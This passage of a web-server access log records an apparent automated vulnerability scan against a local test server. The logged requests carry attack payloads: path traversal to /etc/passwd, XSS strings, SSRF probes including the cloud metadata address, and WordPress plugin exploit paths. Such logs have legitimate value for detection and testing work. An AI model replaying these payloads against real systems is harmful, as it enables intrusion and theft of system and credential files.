HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Grimag/go.php?https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/29KD243NMhj63Vbj9O2rjBuJTjv/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hm/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.427","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /(download)/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KD1xUVbQGtdHtXKessymL6CqQ.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /NateMail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:48 